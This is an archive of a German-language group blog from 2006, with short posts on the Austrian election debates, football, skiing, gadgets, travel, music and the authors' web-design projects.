Um das ganze mal in schwung zu bringen: auch wenn klar ist, dass hc den wolf im schafspelz gibt stelle ich nach nunmehr acht konfrontationen rein subjektiv fest, dass er der einzige ist, der sich bislang tadellos benommen hat, botschaften in leicht verständlichen happen serviert und sich grundsätzlich bisher am besten verkauft hat.

 

vdb´s vorstellung in der gestrigen konfrontation mögene zwar einige als "scharf" und "kontur zeigend" interpretieren, auf mich machte das ganze aber keinen besonderen eindruck. einerseits kopie von westi-aussagen (!!! z.b. geerichtsurteile gegen F-ler), andererseits leeres blabla (die story mit der türkischen studentin - geh bitte...) und oberflächliches zeigen persönlicher abneigung. hc kam viel besser weg und konnte erneut auch sachliches transportieren.

KONFRONTATION ZUR WAHL 2006 pt 7  sTe  16.09.2006 02:12:53
bashing im rechten eck
stay focused 4  sTe  15.09.2006 17:22:25

wohl eines der wichtigsten und umfangreichsten projekte der letzten jahre:

die Hannes Androsch website!

darueberhinaus ein aeusserst angenehmer kunde.

 

daher nur mehr 5 baustellen...

KONFRONTATION ZUR WAHL 2006 pt 6  sTe  15.09.2006 03:52:37
gusi gegen den professor
forza eigene ideen!  rriot  15.09.2006 03:24:20
KONFRONTATION ZUR WAHL 2006 pt 5  sTe  13.09.2006 23:07:57
der kleine pro(e)ll gegen h|c
KONFRONTATION ZUR WAHL 2006 pt 4  sTe  13.09.2006 02:30:41
bartenstein gegen hojac
KONFRONTATION ZUR WAHL 2006 pt 3  sTe  08.09.2006 01:25:27
gusi gegen hojac
stay focused 3  sTe  07.09.2006 00:31:53
XVIIth International Congress of Neuropathology
daher nur mehr 7 baustellen...
KONFRONTATION ZUR WAHL 2006 pt 2  sTe  07.09.2006 00:28:50

gusi gegen h|c

opinions please...

KONFRONTATION ZUR WAHL 2006 pt 1  sTe  06.09.2006 03:06:01

der parteilose gegen den professor...

opinions please...

nr-wahl 2006 II...sachen zum lachen:  rriot  04.09.2006 18:37:51
nr-wahl 2006  rriot  04.09.2006 16:50:30
topic reply record by far  sTe  03.09.2006 23:21:41
as requested: here´s the proof: feelo-topic-reply-count !!!
stay focused 2  sTe  25.08.2006 00:25:09

Initative RUPRECHTSVIERTEL

daher nur mehr 9 baustellen... 

stay focused  sTe  23.08.2006 02:51:08

es gab zwar schon laengere perioden ohne neues posting, aber diesmal gibts wirklich einen grund, oder besser gesagt exakt 10:

10 offene baustellen, wobei allesamt innerhalb der naechsten 44 tage fertiggestellt werden wollen;

3 dieser baustellen beanspruchen auch eine physische praesenz meinerseits vor ort, welches mich allein insgesamt 9 tage kostet.

das kundenspektrum reicht von neuropatholgen, bürgerinitativlern, einer filmagentur (spin off von: NWA was ja schon fertig ist ...), eines fernsehsenders, eines ex-finanzministers bis hin zu einem autokonzern welcher 4 tasks impliziert.

multitasking ist zwar nicht zu verhindern, doch gilt es dies auf ein minimum zu reduzieren:

“Great souls have wills - feeble ones have only wishes” suggests one Chinese proverb.

Stay on task, or you’ll be left wishing you had....for that: please excuse the lack of fresh postings, although there are a cupple of other authors -

but it looks like they might be busy as well :(

 

nevertheless: 4 topics per month is a shame, i know 

feelochamp ´06/07 release day  sTe  09.08.2006 17:52:06
feelochamp 06/07
weils die woche gar so regnet...  sTe  07.08.2006 21:22:07
sbg panorama
swedish chef  sTe  02.08.2006 19:36:32

schon in der kindheit fand ich den typen strange - und jetzt erst recht :)


Swedish Chef - Making Spagetti


Swedish Chef - Making Fish


Swedish Chef - Making Donut


Swedish Chef - Making Chicken


Swedish Chef - Making Squirrel Stew


Swedish Chef - Making Meatballs (erstklassig)


Swedish Chef - Making Banana Split


Swedish Chef - Making Lobsters


Swedish Chef - Making Cake

the worlds biggest hole  sTe  26.07.2006 21:10:19
the wordls biggest hole

this diamond mine in eastern Siberia (Mirny, to be exact) is so deep that the surrounding "air zone... is closed for helicopters" after "a few accidents when they were ´sucked in´ by downward air flow..."
webservice  sTe  24.07.2006 17:17:39

ein neuer webserver musste her - rock solid, laut und reliable (hoffentlich).

 

dell poweredge 

3,2 ghz xeon

2048 mb ram

2x160gig system raid (raid1)

2x250gig daten raid (raid1)

250gig backup pool

powersuply redundant (600W)

 

durch den switch kann es in den naechsten tagen noch eingeschraenkte funktionalitaeten geben. bitte melden !!!

:: DFB-POKAL  bully  17.07.2006 18:41:42
Schon in der ersten Runde des diesjährigen deutschen Pokal-Bewerbs kommt es zur Neuauflage des letztjährigen Halbfinales…
Diese Begegnung wird schön langsam zum Klassiker der „reich gegen arm“–Partien.

10.09.06:
FC St. PauliFC Bayern München => die Revanche!!!
ARD überträgt live…

St. Pauli-Präsident Corny Littmann: "Wir sind fest davon überzeugt, dass wir in die nächste Runde einziehen."

Holger Stanislawski: "Ich habe es prophezeit, wir bekommen unsere Revanche für das 0:3. Etwas besseres konnte uns gar nicht pasieren. Wir sind total glücklich."

nähere Infos HIER
noch so ein zidane-game ;)  bully  14.07.2006 22:24:26



headkick in salzburg  sTe  12.07.2006 15:21:54
den author kennen einige doch auch :) http://www.youtube.com/watch?v=js0vOgjBfD8
mehr auf: Leben in Salzburg
Beton  sTe  06.07.2006 16:34:48
Concrete Soccer
Zu Gast bei Freunden  romario11  03.07.2006 00:59:25
Letzte Woche war die Partie (Bully, Hons, Sally und ich) wahrlich zu Gast bei Freunden. Neben der Wahnsinnsatmosphäre und dem allseits in- und außerhalb der Stadien grassierenden WM-Fieber, absolut friedlichen Fans und fast immer pünktlichen öffentlichen Verkehrsverbindungen ( ;) ), haben wir eine derart herzliche Gastfreundlichkeit erlebt, die zumindest mein Bild von unseren Lieblingsnachbarn gehörig zurechtrückte.

Ein dickes Dankeschön sei an dieser Stelle der Familie Sarasa in Ratingen bei Düsseldorf geschickt, die uns Fussballrowdies unbekannterweise drei Tage lang freundlichst aufgenommen und verpflegt hat (inklusive eigenem Kühlschrank voller Düsseldorfer Alt, versteht sich).

Nachdem sich die Papas unter uns am Mittwoch wieder Richtung Family verabschiedet haben, haben ich und Sally noch eine kleine WM-Tour abseits der Austragungsstätten gemacht und den Mittelrhein, Heidelberg, Rothenburg, Bamberg und Passau besichtigt. Auch dort überall ausgesprochen freundliche Menschen wo immer man hinkam, selbst mit Argentinien-Leiberl, auch vor dem besagten Spiel. Alle besichtigten Orte sind absolut einen Besuch wert, sehr interessant, Rothenburg mit nichts vergleichbar, was wir bisher an historischen Städten gesehen haben.

In dieser Verfassung ist unser Nachbarland in Punkto Gastfreundlich bereits jetzt schon weltmeisterlich unterwegs. Meine Mitreisenden mögen in ihren Kommentaren eine andere Meinung vertreten, aber ich würde diesem Deutschland mit seinem jungen und sympathischen Team nach den letzte Woche gesammelten Eindrücken auf jeden Fall auch sportlich die Krone vergönnen. Full Picture Gallery to follow.

Österreich und Schweiz: bitte ganz dringend eine dicke Scheibe für die EURO 2008 abschneiden, organisatorisch, stimmungsmäßig und sportlich!
in between soccer  sTe  24.06.2006 02:17:24

remarkable adverts

 

hey ya, charlie brown!

 

 

music videos  sTe  21.06.2006 17:58:57

100 Awesome Music Videos and 1400 music videos from the 80s

 

bluedome  sTe  14.06.2006 18:27:35

bluedome

 

ein indeed! game in der wunderbaren welt des wassers - BlueDome:


Das Blue Vision Game
"Erleben Sie die faszinierensten Wasserwunder der fünf Kontinente.
Bei diesem interaktiven multimedialen Computerspiel geht es darum, Fragen zu den Wasserwundern dieser Welt zu beantworten und dabei auch fasizinierende Einblicke in die Welt des blauen Planten zu gewinnen. Testen Sie Ihr Wissen mit dem einzigartigen Computerspiel."

NA BUMM...  bully  12.06.2006 19:53:47
Quelle: Kurier online von heute

Sidtirol isch insa!

ICH GRATULIERE...  bully  11.06.2006 05:44:34
... unserer Austria Salzburg zum KLassenerhalt!!!! und aber auch ganz besonders meinem Stammverein SV GRÖDIG (ok, das war noch in den 70er Jahren ;) ) zum heute fixierten Meistertitel der 1. Landesliga und zum Aufstieg in die Regionalliga West!!!!

TABELLE
off to saalfelden  sTe  06.06.2006 16:48:08
saalfelden
new tool  sTe  26.05.2006 17:47:07
acer8202
introducing: the acer 8202wmli
footie  sTe  23.05.2006 15:02:46

what an extension!!! wohl mein erstes nicht development spezifisches add-on fuer den firefox: FootieFox

va der akustische toralarm rulez :)

 


 

Beginnende Altersschwäche  romario11  23.05.2006 04:55:33
Ich habs ja schon beim Kauf meines letzten Handys geahnt - schon damals habe ich die dicke Gebrauchsanleitung schnellstens wieder beiseite gelegt, weil ich erstens eh schon grundsätzlich keine Geduld für sowas habe und zweitens das meiste sowieso nicht kapiert hätte.

Jetzt denke ich schon geraume Zeit daran, ein paar Geräte unseres Home Entwertainment Systems zu erneuern. Mittlerweile habe ich das aber komplett aufgegeben. Ich habe nämlich versucht, mich per Tests und durch Download der entsprechenden Bedienungsanleitungen schlau zu machen, was die Teile alles können und insbesondere, was sie können sollten, um mich happy zu machen.

Ist komplett zu vergessen. Viel zu kompliziert, unverständliche Anleitungen, ein Horror. Entweder sind Elektronikgeräte heutzutage wirklich statt einfacher viel komplizierter geworden, oder es zeigt sich bei mir tatsächlich der Zahn der Zeit. Leute, ich glaub ich werd alt... Gehts wem ähnlich? Und wie wird das erst in 30 Jahren ausschauen, dann krieg ich ja überhaupt nix mehr mit...
barcenal - not really a great difference  sTe  16.05.2006 23:23:37
geisterfahrer  sTe  16.05.2006 22:43:30

geht es nach dem Verkehrsministerium, sollen bald diese schilder vor geisterfahrern (korrekter begriff eigentlich ´falschfahrer´) warnen. allein den sinn kapier ich nicht ganz: geisterfahrerwarnungen sollten mmn akkurat und zum tatsachlichen zeitpunkt erfolgen; generelle warntafeln hingegen stumpfen ab; aber bitte...wir hamm eh viel zuwenig schilder,...

ev wuerde es auch helfen ueber die gruende der eklatanten geisterfahrerhaeufigkeit hierzulande nachzudenken, anstatt plakativ davor zu warnen; in anderen laendern gibts den begiff an sich nicht einmal - geschweige denn schilder!.

wuerg  sTe  10.05.2006 20:11:50

irgendwie schaffen sies immer einem die freude an etwas ein wenig zu mindern @%§#

http://sport.orf.at/060510-28476/index.html

 

es gibt defacto niemanden den ich mehr verabscheue!!! 

:: FAMILIENURLAUB IN KIRIS  bully  09.05.2006 04:12:39

Wir hatten eine wunderschöne Woche in Kiris (60km südl. von Antalya) im One Resort World...

... und würden am liebsten gleich wieder hinfliegen!!!

Fotos
It just works.  sTe  03.05.2006 21:10:06
I´m a pc, I´m a mac
btw - this mouse rocks - also on my pc :)
frage des tages  sTe  03.05.2006 04:36:25

nach einer angeregten diskussion :) beim mittagessen mit den kollegen, und daraus resultierender wette bezueglich der aussage:

"warum soi a fisch trinken?!?" - folgende aufloesung:

 

"Der osmotische Druck" - Fische trinken - aber es hängt davon ab, ob es sich um Salz- oder Süßwasserfische handelt. Denn bei Süßwasserfischen dringt das Wasser durch den osmotischen Druck von allein ein: Die in den Zellen gelöste Flüssigkeit enthält mehr Salze als das Außenmedium, so dass das Wasser selbstständig in die Tiere diffundiert.

 

Süßwasserfische nehmen das Wasser durch die Kiemen und die Hautoberfläche auf. Würden sie das überflüssige Wasser nicht über seine Nieren ausscheiden, würde sie sich ständig ausdehnen, bis sie platzen. Beim Salzwasserfisch ist es genau umgekehrt. Der Salzgehalt des Meerwassers ist wesentlich höher als der im Körper des Fisches. Nach derselben osmotischen Gesetzmäßigkeit wie beim Süßwasserfisch saugt das Meerwasser diesmal aus dem Körper des Fisches das Wasser heraus.
Der Salzwasserfisch trinkt durch Mund, Schleimhaut und Kiemen und nicht über die Hautoberfläche. Die Haut hält das Meerwasser ab, In den Kiemen hat er spezielle Vorrichtungen, die das Eindringen des Salzes verhindern, das Meerwasser entsalzen und es so zu Trinkwasser machen: Das Trinkwasser bekommt den selben osmotischen Druck wie das Blut im Fisch.


Es gibt aber auch einige Ausnahmen unter den Salzwasserfischen: Haie und Rochen haben die Natur überlistet, sie gleichen den osmotischen Druck aus, indem sie die Konzentration im Harnstoff erhöhen und damit dagegenwirken. Haie und Rochen saugen also genau wie Süßwasserfische das Wasser aus dem Meer auf und müssen deshalb zusehen, wie sie es wieder ausscheiden.


Fischarten, die in beiden Gewässern leben wie Lachse oder Aale, können beides. Sie können Wasser aufnehmen und Wasser abgeben. Sie benutzten dazu ihren Harnstoffspiegel. Sind sie im Süßwasser, wird der Harnstoffgehalt verringert. Sind sie im Salzwasser, wird der Harnstoffgehalt gespeichert.

Frühlingserwachen  Clez  27.04.2006 09:23:53
Frühlingsglaube

Die linden Lüfte sind erwacht,
Sie säuseln und weben Tag und Nacht,
Sie schaffen an allen Enden.
Nun, armes Herze, sei nicht bang!
Nun muß sich alles, alles wenden.

Die Welt wird schöner mit jedem Tag,
Man weiß nicht, was noch werden mag,
Das Blühen will nicht enden.
Es blüht das fernste, tiefste Tal:
Nun, armes Herz, vergiß der Qual!
Nun muß sich alles, alles wenden.

 

Ludwig Uhland (1787 –1862)

♦♦♦♦♦

Nicht verzweifeln, meine lieben Freundinnen und Freunde der Schneeregentage und Finsternis, nassen Füße und klammen Finger, Melancholie und Johnny Cash: es gibt Hoffnung! Und zwar in Form einiger schön düsteren Musikstücke, welche die kalte Jahreszeit hervorgebracht hat und die über dunkle Kanäle den Weg von Down Under in die Gehörgänge schaffen.

Die Sonnenstrahlen verschwinden, die Erde tut sich auf und es erscheinen: Tex Perkins (vocals) und seine Kumpels Don Walker (piano, voc.) + Charlie Owen (guit.). Das Album: „All Is Forgiven“; wunderschöne Balladen, sparsam arrangiert, recht bluesig mit Country-Anklängen das Ganze. Hin und wieder sogar nicht ganz so langsam.

Mehr soll an dieser Stelle nicht kluggesch***n werden, hört Euch das nach Möglichkeit einmal an.

 

Ähnliches Anti-Frühlingserwachen verspricht der von unserer Community schon seit Screaming Trees-Zeiten anfangs der 1990er verehrte Mark Lanegan, der zusammen mit Isobel Campbell (ehemals vocals bei Belle And Sebastian) „Ballad(s) Of Broken Seas“ gegen allzu viel Fröhlichkeit unters Volk bringt. Es gilt das oben gesagte. Vielleicht hin und wieder etwas *grooviger*.


Erwartungshaltungen werden leicht enttäuscht; mehr Info für diejenigen, die mehr wissen (als hören) wollen daher in folgenden zwei links oder den Suchergebnissen der Suchmaschine Eures Vertrauens.

 

http://www.isobelcampbell.com/#
http://www.texdonandcharlie.com/bio.php?PHPSESSID=f55624c2c381fbff7aba0373e94960b5

Ein kleiner Stilbruch: Der vom lieben D., alias Johnny Weissmüller, und auch von mir sehr geschätzte Herr Ursula 1000, New Yorker DJ und Remixer, hat wieder Tanzbares und Poppiges herausgebracht: „Here Comes Tomorrow“ heißt das Album, werde ich sicher auf der nächsten Hochzeitsfeier auflegen. Wer mag?

Hörproben gibt’s beim Online-Händler eurer Wahl. Albumuntypischer Hörtipp: die letzte Nummer; klingt nach einem verschollenen Track aus der Space Oddity; allein, es singt nicht Bowie sondern ein gewisser Robert Conroy.


Nachtrag: DJ Hochzeitsböller kommt auch zu Hochzeitsjubiläen; das erste gibt’s schon nach einem ¾ Jahr, und zwar die „Bierhochzeit“. Hatten meine Frau Gemahlin und ich letztes Wochenende; fiel praktischerweise mit dem griechisch-orthodoxen Osterfest zusammen; wurde dem Anlass entsprechend gewürdigt.

 

Siehe auch: http://www.hausfrauenseite.de/index.shtml?http://www.hausfrauenseite.de/hochzeit.html

So ein Tag, so wunderschön wie heute...  romario11  21.04.2006 17:26:16
Fifa WC 2006 Tickets for Dortmund have arrived!!!
propaganda  sTe  20.04.2006 15:53:20
indeed! news
keine dosen mehr!!!  sTe  14.04.2006 05:34:22

dieser verein schaft es in einer unglaublichen frequenz immer noch unsympathischer zu werden....

http://sport.orf.at/060413-27690/index.html

http://salzburg.orf.at/stories/102273/

kann mich noch sehr gut erinnern wie sich Jara bei amtsantritt gegen den kunstrasen ausgesprochen hat...

verlogen, feig und brainwashed - NEIN DANKE !!!

(btw: erstes spiel wo ich die gruen weisse scheisse supporte...) 

panini  sTe  13.04.2006 18:48:53
panini
fresh and smells so fine....
some stuff...  bully  12.04.2006 17:06:37

Schluss mit wenig, her mit mehr ;)

Foto vom Mars (high-resolution)

unglaublicher Spielzug (7 sec. vor schluss)

als sie noch Kinder waren...
(beeindruckend: Freddy Mercury, Kurt Cobain und Tina Turner)

360°-Foto von Paris bei Nacht

It´s magic

Zeit zum Reifenwechseln!!!

The Evil Villain Test:

Apocalypse

You scored 38 % maniacal, 50 %intelligent, and 61% power!

Apocolypse may be one of the worst enemies to come against. He is very powerful and very influential. He has the power to destroy all of humanity and will use it when he has the chance. It takes a lot of heros to take down this bad guy. Not only is he powerful himself, he also has an army to back him up.


















Compared to other people your age and gender:

You scored higher than 20% on maniacal

You scored higher than 16% on intelligent

You scored higher than 92% on power
psh phs phish  sTe  11.04.2006 21:00:50
phishing
ganz sicher...vor allem die auf der website geforderten 10 !!! tans :)
die t frage  sTe  11.04.2006 15:50:02

als ob die deutsche fussballmannschaft keine anderen sorgen haette: ueberall kraenkelts eigentlich: in der abwehr, im midfield, ein wenig auch im sturm; allein die tormaenner sind eigentlich beide ueberragend;

dass sich "klinsi" so lange zeit gelassen hat, ist eigentlich laecherlich, da er ja mit der entlassung Sepp Meiers schon klar sein committment pro Lehmann erkennen liess. auch wenn das heftig dementiert wird und immer auf den fairen 2kampf gepocht wird.

und so halte ich es wie Paul Breitner: "Wer des glaubt wird seelig - und seelig wue i goar ned wern!"

dass jetzt Olli Kahn zum stillen Helden stilisiert wird kann den Deutschen noch ordenlich auf den kopf fallen - die stimmung im team wird sicher nicht besser - den pausenclown nehm ich ihm nicht ab.

wer gestern seine  pressekonferenz gesehen hat und wem dabei nicht schlechtgeworden ist dem zolle ich mein unverstaendnis.

neat new toy   romario11  03.04.2006 02:48:22
having used the tomtom gps navigation system with our hp handheld in the car for the last 1 and 1/2 years we are convinced of these handy little helpers through known and unknown territories.

now i got myself another gadget from amsterdam headquartered tomtom: tomtom rider, a specifically developed gps navi for motorcycles. it was easy to mount on the t-bar of the bike. screen is very visible while driving and the voice guiding instructions are transferred via bluetooth headset directly into my helmet. another nice addon: the navi also serves as a handsfree system for the mobile phone.

today i had the chance to test drive it and so far everything works great. i am looking forward for the first longer tour to come, being able to navigate without the need to try figuring out the way via a folded map in my tank bag. :)
press  sTe  23.03.2006 23:41:49
unlaengst gegenstand einer pressekonferenz
current desktop  sTe  22.03.2006 21:10:01
desktop 02.03.06
wallpaper: strange world VII by ~kol
visual style: vista v3
cap & capper  sTe  20.03.2006 23:22:37
iycn - cap
kreativteam  sTe  11.03.2006 14:31:54
kreativteam
...latest work
backup  sTe  10.03.2006 22:29:57
die tatsache dass mitlerweile alle photos und videos sowie audio in digitaler form festgehalten werden, verlangt eine vernuenftige backup loesung:
ich habe mich fuer dieses eher fette seagate teil entschieden und sie dementsprechend ´mops´ getauft. vorteile: 16mb cache und kein nervender luefter...
dubai  sTe  10.03.2006 17:27:33

schon arg was die da unten auffuehren:

Dubai´s World-Beating Buildings und Falconcity

feelocook  sTe  08.03.2006 15:32:23

nicht ganz neu der trick aber in der variation ziemlich professionell:

How to peel cooked potato skin in one shot
ohne gewaehr - i still have yet to try it.

Verabschieden uns für a wocherl  romario11  04.03.2006 03:17:26
ins kärntner land. hab gehört es soll schön powdern. und weil ich ein grundgemeiner mensch bin muss ich das hier in alleröffentlichkeit mitteilen.

viel spass im kalten wien.
current setup  sTe  03.03.2006 21:13:34

current setup
current office workstation (look how clean it is :))

details if you are interested

doping @ XX  sTe  25.02.2006 04:28:20
feelo hat lange genug geschwiegen - zurecht wie ich meine:

jetzt wo die tatsache auf dem tisch liegt - KEIN athlet konnte positiv getestet werden - und nach all dem muell den die abgekartete, hinterfotzige RAZZIA aufgebracht hat!!!

ich moechte herrn Wallner fuer sein unsaegliches versagen danken! - luegen und abputzen, danke, DANKE !!!

und so wies aussieht, den herrn Schroecksnadel fuer mich persoenlich halbwegs rehabilitieren.

bleibt das bauernopfer Mayer...tja was soll man sagen: bloed glaufen,...wenns denn so is...ich fuerchte wir werns nie erfahren...

@ IOC: FUCK YOU !!! (...abstract for international readers)
thema: guter geschmack?  sTe  23.02.2006 18:35:29


raich  sTe  15.02.2006 02:14:16
VOLLLUSCHE

respekt fuer Ligety und gratulation: no risk no fun!

und das fehlt ihnen hr.raich, begnadetes talent ist zuwenig wenn mans nicht zu nutzen weiss...

 

UPDATE: rehabilitiert :)

Schwache Olympia Website  romario11  12.02.2006 02:44:02
Üblicherweise kann man unserem GIS-TV ja nicht gerade schlechte Coverage von Wintersportgroßereignissen nachsagen, aber die Olympia-Website finde ich ziemlich schwach dieses mal.

Nicht einmal eine Tagsübersicht auf einer Seite bringen, stattdessen muss man sich durch alle Disziplinen durchklicken, um die Ergebnisse zu sehen... Mühsam.
new gadget w800i  sTe  10.02.2006 19:30:49
w800i
nach jahrelangem nokia vertrauen lass ich mal ein sony-ericsson an mein ohr, gerade wegen dem walkman feature mit 512MB card includiert. und auch das auge hat was davon mit der 2MP camera mit pseudo blitz ...
kleiner wermutstropfen: kein UMTS - aber dafuer hab ich ja noch das 6630
pirated indeed! website  sTe  10.02.2006 19:32:52

pirated indeed
...der vergleich macht sie sicher: original und kopiertes !!! nach freundlicher anfrage bei dem herrn, zuerst blankes entsetzen, dann gestammel wie "dass muss ein zufall sein...", und nach androhung aller rechtlichen schritte: "tut mir leid, das hab ich nicht gwuuust...ich werds aendern..."

detail am rande: es handelt sich um einen in ungnade gefallenen ehemaligen mitarbeiter...besonders dreist!

:: SUPERBOWL XL  bully  02.02.2006 17:01:14

Superbowl 40 (daher XL) naht mit grossen Schritten
Austragungsort: Ford Field in Detroit, Michigan
Wann: in der Nacht von Sonntag auf Montag.

Die Kontrahenten:

Pittsburgh Steelers vs. Seattle Seahawks 21 - 10

Mit den Steelers ist erstmals ein an 6 gesetztes Team im Superbowl. Das heisst die Steelers mussten zuvor in den Playoffs hintereinander gegen die an 3, 1 und 2 gesetzten Teams der AFC auswärts gewinnen; und genau das taten sie auch, in wirklich beeindruckender Manier! Den in der NFC an eins gesetzten Seahawks reichten in den Playoffs zwei relativ unspektakuläre Heimsiege; +10 gegen die Redskins und +20 gegen die bis dahin sehr staken Panthers.

Es wird wohl eine recht offene Partie mit wahrscheinlich recht vielen Punkten; ich glaub kaum, dass 25 Punkte für den Sieg reichen werden. Wichtig wird sein, wer besser gegen den Lauf verteidigt, und wer, wenn er sein Laufspiel nicht etablieren kann, dann die besseren Alternativen, Screenplays, durchaus auch Trickspielzüge und dergleichen auf Lager hat. Am Sonntag braucht keiner mehr irgendwelche Geheimwaffen in der Hinterhand halten, alle Karten können offen gelegt werden, das Spiel der Spiele ist da!

Mein Tipp:
Sieg Steelers, hier der riskante Tipp: der Sieg fällt eindeutiger aus als alle erwarten: 37-24 oder so ;)

PS: Half Time Highlight: The Rolling Stones

------------------


ich gratuliere den steelers, der 5. titel ist im kasten (geteilter rekord mit den 49ers und den cowboys)!!!

die steelers haben in einem nicht immer hochklassigen aber lange zeit spannenden spiel verdient gewonnen. die seahawks hatten sehr viele chancen auf entsprechend punkte, bevorzugten in dieser nacht aber diese auszulassen; so kann das natürlich nichts mit einer trophy werden...

ad ps: die live-darbietung der stones muss ich als selbstdemontage eines denkmals bezeichnen; einfach nur schlecht bis peinlich. geht´s in pension burschen; die sexy rebels kann man euch nicht mehr abnehmen und wenn mitte 60-jährige "I can´t get no satisfaction" singen, ist halt maximal der besuch beim urologen zu empfehlen! traurig war das!
no mozart  sTe  02.02.2006 15:21:46

das haus indem Mozart auf seiner 3. reise nach Prag NICHT uebernachtete!

gesehen in der Myrthengasse / 7.Bezirk...danke :)

beitrag nr. 2  Clez  02.02.2006 00:06:03

)((((_

I-O-o--I

I \___/ I im untenstehenden beitrag geht´s übrigens - bei aller

\ . ::..: / bescheidenheit - um mich selbst. falls noch unbekannt: siehe nebenstehendes, retuschiertes foto (welches, nebenbei bemerkt, die web-graphik revolutioniert). das linke, nicht das random-foto rechts!

 

guugugg!!  Clez  01.02.2006 23:48:11

liebe feelosopheeer,

hiermit betritt ein neuer, unerhört dynamischer und eloquenter blogger die bühne des internetzes; wie auch schon die überschrift vermuten lässt.

haltet euch fest.

Ice Skating on Neusiedlersee  romario11  31.01.2006 14:37:04
Having spent the weekend in Burgenland we had the chance to go ice skating on the neusiedlersee. It was a phantastic experience. Really wonderful ambience - see the pics on feelophoto.

If you have the chance to do the same next weekend - may it be warmly recommended.
Geiler St. Pauli Kommentar zum Bayern-Los  romario11  30.01.2006 22:53:31
Aus der FC St. Pauli Website:

Dann eben zuerst die Bayern... Birgit Prinz zog am Samstag im Rahmen des "Aktuellen Sportstudios" die Halbfinalbegegnungen im diesjährigern DFB-Pokal. St. Pauli empfängt die Bayern, Bielefeld tritt in Frankfurt an.
Mit ex-Nationalspielerin Birgit Prinz konnte ja nichts mehr schief gehen - und somit loste sie uns den aktuellen Tabellenführer der Bundesliga, den Rekordmeister und Rekordpokalsieger für das Halbfinale zu.

Am Di/Mi, 11./12. April treten Ballack und Co. also am Millerntor an. Bielefeld packen wir dann im Finale, - welches nun natürlich gewonnen werden muss, damit es im August heißt: Bratislava oder Barcelona - Hauptsache Italien...

Next are the Oscars  romario11  30.01.2006 20:47:54

I have just received notice that one of the dear friends from out our circle can be congratulated for a huge success!

The movie "Zen & Zero", which was already recommended previously on this site was nominated for several categories at this year´s x-dance Action Sports Film Festival, taking place in Park City, Utah, from 20-24 January 2006. Nominations included Best Picture, Best Director, Best Original Score and Best Story.

and guess what: the award for "Best Director" went to: MICHAEL GINTHÖR for Zen & Zero!!! Michi, to some of us beter known as Gugs, really hit it big this time!

Hopefully, the increased attention and wider movie distribution connected to this great award will get the movie and its director a big step forward towards Hollywood madness and, who knows, maybe in some years we may even congratulate Michi to Academy honors... :)) Congratz Gugs!!! Great job!

feelotags  sTe  27.01.2006 20:15:44
habe soeben ein kleines script geschrieben welches alle suchbegriffe, ueber die besucher auf feelosophee gefunden haben, nach ihrer haeufigkeit dargestellt, auflistet: feelotags!
four things  sTe  26.01.2006 17:44:40

memes are silly, i know....but anyway:

 

Four jobs I´ve had in my life

  • geographic information system administrator
  • medical test person
  • barman in several pubs
  • web developer
Four movies I can watch over and over Four places I have lived
  • Salzburg
  • Vienna (District: 5,6,7,8,9)
  • still yet to be determined...
  • still yet to be determined...
Four TV shows I love to watch Four places I have been on vacation
  • Maledives
  • USA (San Francisco, New York, Connecticut)
  • Portugal
  • Greece
Four of my favourite dishes
  • roast pork
  • selfmade lasagne
  • sirloin steak
  • saltimbocca alla romana
Four websites I visit daily Four bloggers I am tagging
Pokalmaerchen St.Pauli  sTe  26.01.2006 16:28:54
regionalligist FC St. Pauli steht nach einer großartigen kaempferischen leistung und einem 3:1 (1:1) gegen CL-teilnehmer Werder Bremen erstmals in seiner vereinsgeschichte im halbfinale des DFB-Pokals und kann sich ueber einnahmen in der hoehe von 800.000 euro freuen.

Die "B"-Serie: nach "Burghausen", "Bochum", "Berlin", und jetzt "Bremen" koennte nun "Bielefeld" oder "Bayern" als naechster gegner gelost werden.

ghostrider 2k6  sTe  26.01.2006 00:59:08

den ghostrider aus Schweden, den gibts ja schon seit 2003. mittlerweile hat er seine Hayabusa auf stolze 499 PS hochgezuechtet und treibt auch in Frankreich und Deutschland sein unwesen.

dieser ehemalige und in die jahre gekommene motorradrennfahrer ´mika´ aus Stockholm vermarktet sein koennen geschickt ueber das Internet, und holt sich so die kohle, der er frueher vergebens nachfahren musste. verfolgungsfahrten mit den cops bei tempo 340 werden perfekt ueber helmkamera, rear-view und befreundeten helfern auf scheibe gebracht.

und diese filme habens in sich, auch wenn das eine oder andere gestellt sein mag, egal - der typ KANN fahren, und wie!!!

 

(...das alles nur weil heut eine postsendung mit einem solchen filmchen im kastl war...THX A LOT MATE!!!)

wahre helden  sTe  21.01.2006 06:19:36
hermann´s back !!! so schauts aus! wer braucht schon retorten-warmduscher-luschen wie den ach so lieben bennie, der (mir immer schon unsympathisch weil ZU angepasst, ZU clean, ZU orf) seit wochen nur mehr auf punkte faehrt, und somit heute die arschkarte mit platz 31. mehr als verdient.
helden sind aus anderem holz geschnitzt - dazu raicht auch kein gesamtweltcupsieg!


Sche woars!  sTe  16.01.2006 07:02:00
Wie jedes zweite Jahr haben wir heuer wieder Weihnachten und Neujahr in der Ferne mit Sallys Family verbracht.

Wie unschwer zu erkennen ist, habe ich erst gar nicht versucht, mich als Einheimischer zu tarnen. Das ist aber in der DR auch nicht nötig. Die Leute dort sind zu allen nett, auch zu einem Gringo aus Europa.

Was auch dieses mal wieder faszinierend war: man muss sich nur einen Zentimeter abseits der Trampelpfade von LTU und TUI bewegen und findet Traumstrände in der absoluten Hochsaison fast für sich alleine. Take a look!
fs-kinematics  sTe  14.01.2006 03:16:16
another fellow (some might be acquainted with Hannes Fleischer) has produced an astonishing product: fs-kinematics - an interactive tool for simulating mountainbike behaviour, where you can find the ideal bike configuration for your individual needs...
satuGO  sTe  14.01.2006 01:24:33
a very nice guy from denmark (and former co-worker @ nofrontiere) has developed an intresting gimmick: satugo - the worlds first bouncing ball camera.
he´s currently looking for investors to make this idea come real.
so if you´re intrested feel free to contact him :)
Vienna Autoshow 2006  sTe  13.01.2006 16:01:16
manchmal hat man ja das besondere vergnügen berufliche herausforderungen mit den eigenen persoenlichen interessen zu verbinden. so wie alle jahre auf der vienna autoshow. leider gibts dieses jahr nur wenige highlights (zu sehen in feelophotos). man merkt halt allerorts den schwaechelnden zustand der autoindustrie...
ps: preproduction photos
feelofavs 2005  sTe  08.01.2006 18:25:51
  1. System Of A Down - B.Y.O.B.
  2. Weezer - Beverly Hills
  3. Go-Betweens - Finding You
  4. The Kills - Only The Good Ones
  5. Jack Johnson - Do You Remember
  6. Gorillaz - Dare
  7. Oasis - The Importance Of Being Idle
  8. Kasabian - Reason Is Treason
  9. Supergrass - St. Petersburg
  10. Kettcar - Deiche
  11. Stereophonics - Dakota
